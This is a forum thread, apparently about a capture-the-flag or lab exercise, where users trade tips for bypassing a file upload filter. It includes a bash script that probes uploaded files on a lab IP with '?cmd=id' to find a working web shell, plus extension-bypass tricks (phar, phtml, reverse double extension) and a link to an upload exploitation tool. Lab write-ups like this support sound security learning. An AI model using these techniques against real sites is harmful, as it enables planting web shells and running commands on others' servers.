Hey,
Thanks a lot. With your help I solved this… :)
For those who are still struggling - EZi0’s comment will get you what you need.
Some steps to help you:
This is the script I like to use to automate commands feeding in a wordlist as a variable. ex. ./repeat.sh wordlist.txt
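```bash
#!/bin/bash
# Usage: ./repeat.sh wordlist.txt
# Reads the wordlist given as the first argument and runs the command
# once per line, substituting each line for $line.
input="$1"
while IFS= read -r line
do
    echo "doing $line:"
    # -I sends a HEAD request, so only the status line and headers are printed.
    # The URL is quoted so the shell does not treat '?' as a glob character.
    curl -I "http://139.59.171.86:32638/profile_images/${line}?cmd=id"
done < "$input"
```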
Hope that helps
If you haven’t solved it, from what I can remember you are super close; try more combinations of characters. The file will be uploaded with the extension you try and will be reachable, you just need to find the right one.
Was stuck here for a long time trying to get character injection techniques to work and was not successful. I was able to upload files successfully with character injection but attempts to reference them always came back as 404. I thought this was working because phps was giving me no permissions, but I found anything.phps gave the same error so that message wasn’t indicative of anything.
The advice in this thread around expanding the extensions beyond what you use in the script is helpful, and then what I noticed is that phar and phtml had a lot more “successes” than php with character injection. Even though I didn’t use character injection, this sparked the realization that they were treated differently and a more simple approach with those might work.
Wish I had been able to get character injection going. I tried doing the curl script after the upload script but just got not found on every file link. Also tried just removing the characters, since I would think the goal is that these injections save your file as shell.php, but that didn’t work either. In the end, still got there though.
Quick tip: the example from "Reverse Double Extension" works fine for this task (but not with .php, try a different one)
Also can try this tool: GitHub - almandin/fuxploider: File upload vulnerability scanner and exploitation tool.